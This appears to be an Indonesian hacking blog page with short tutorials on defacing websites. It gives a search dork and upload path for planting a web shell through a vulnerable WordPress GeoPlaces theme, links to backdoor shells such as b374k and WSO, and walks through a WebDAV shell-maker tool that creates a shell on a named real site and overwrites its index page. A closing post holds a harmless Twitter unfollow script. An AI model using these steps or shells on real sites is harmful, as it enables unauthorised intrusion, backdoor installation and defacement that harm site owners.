Wordpress GeoPlaces 4.x Themes Shell Upload Vulnerabillity

Ok, kali ini saya akan share tutorial deface mengguakan Wordpress GeoPlaces 4.x Themes Shell Upload Vulnerabillity.

• Pertama kalian cari target dulu menggunakan dork "index of wp-content/themes/geoplaces4/"
• Setelah mendapatkan target kalian masukan exploitnya "http://target.com/wp-content/themes/GeoPlaces4/monetize/upload/".
• Sebelumnya kalian harup melihat versi themesnya, misalkan versinya Geoplace4.1.2, maka kalian harus mengganti versi themes di exploitnya menjadi versi web tersebut. Contoh: "http://target.com/wp-content/themes/GeoPlaces4.1.2/monetize/upload/"
• Setelah itu akan muncul tulisan Browse, nah tinggal kalian upload shell kalian.
• Setelah selesai upload, kalian bisa akses shell kalian di http://target.com/uploads/[years]/[month]/nama_shell_kalian.php

Sekian sedikit tutorial dari saya =D

Read More

Kumpulan shell backdoor

Kali ini saya akan membagikan beberapa shell yang sering saya gunakan ^_^
Bagi yang ingin mendownload shell b374k bisa di download disni

Shell injection bisa di download disini 

Shell Ani-Shell bisa di download disini

Dan yang terakhir wso shell bisa di download disini 

Read More

Tutorial Deface dengan webdav shell maker

Kali ini saya akan memberikan tutorial hacking menggunakan webdav. Webdav adalah tools yang di buat oleh Hmei7.

• Pertama silahkan download webdavnya disini
• Setelah selesai, silahkan matikan antivirus terlebih dahulu, kemudian buka aplikasi webdavnya.
• Setelah buka web dav klik asp shell maker.

       

• Setelah klik " Asp shell maker " anda akan melihat Program Webdav Shell Maker , jika sudah ada program Webdav Shell Maker anda klik tulisan " Setting".

      

                                        

• Setelah klik setting edit tulisan '/Hmei7.asp;.txt'  menjadi yang anda mau contohnya: '/MR.WWW.asp;.txt', tapi jika anda tidak ingin mengubahnya juga tidak apa-apa.
• Selanjutnya anda tinggal memasukan website target caranya klik "Add site". Jika sudah memasukan target klik "serang".
• Jika muncul seperti ini

checking : http://odelagrange.com
    shell created !!
    http://odelagrange.com/bLacK_.asp;.txt

    

• Jika sudah muncul copy urlnya, contoh:  http://odelagrange.com/MR.WWW.asp;.txt.
• Anda cari tulisan ( index.asp / index.html / index.htm / index.php / yang berhubungan dengan index.

    

• Tinggal edit dengan cara klik tanda seru. Ganti script di dalamnya dengan script deface anda. Lalu klik save/kaydet.
• Jika berhasil maka akan muncul tulisan " File Edited Successful:) " , di bagian atas kiri.
• Hanya begitu anda telah berhasil mendeface website tersebut =D

 Sekian sedikit tutorial dari saya :D

Read More

Tutorial Unfollow secara cepat di twitter

Mungkin banyak dari kalian yg menggunakan auto follow sehingga following kalian menjadi sangat banyak bisa mencapai ribuan. Tentu kalian ingin untuk mengurangi jumlah following. Saya akan membagikan caranya =D

1. Buka https://twitter.com/following
2. Kemudian CTRL+SHIFT+J 
3. Tinggal masukan script berikut

setInterval(function(){t=$(".following button:eq(-1)");if(!t[0])window.scrollTo(0,$(document).height());else t.trigger("click")},100)

Tinggal kalian tunggu, jumlah following kalian akan berkurang.

Read More